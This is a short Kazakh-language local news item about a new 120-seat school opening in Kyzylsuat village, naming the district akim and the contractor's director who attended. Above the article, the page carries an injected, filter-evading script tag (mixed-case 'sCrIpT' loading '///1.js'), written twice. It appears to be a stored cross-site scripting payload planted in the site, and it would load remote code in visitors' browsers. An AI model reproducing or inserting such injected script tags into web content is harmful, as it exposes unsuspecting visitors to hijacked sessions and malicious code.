<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

14.12.2017

     Бүгін 06.11.2017 ж. Талапкер ауылдық округына қарасты Қызылсуат ауылында аумақты дамыту кешенді жоспарға сәйкес,   1 желтоқсан – Тұңғыш Президент күні қарсаңында 120 орынға арналған «Таир» ЖШС мердігерінің тапсыруымен жаңа мектеп ашылып, ұстаздар, ауыл тұрғындары, ата – аналар үшін үлкен қуанышты күн  аталып өтті. 

     Елбасының «Болашаққа бағдар: Рухани жаңғыру» бағдарламасы  ұлт бірегейлігі мен рухани мұрамыз,  қазақстандық жастардың  білімі мен тәрбиесіне жаңа серпін берді.

    Бүгінгі жаңа мектептің ашылу салтанатты мерекесіне  Целиноград ауданының әкімі Таткеев Малгаждар Саттарұлы, аудан маслихатының хатшысы Жанбаев Берик Амантайұлы және «Таир» жауапкершілігі шектеулі серіктестігі мердігерлігінің директоры  Мырзахметов Ермек Қуандықүлы қатысып, лебіз- тілектерін білдірді.

Просмотров: 926


Пікір қосу



Деректерді қолтаңбаға қосу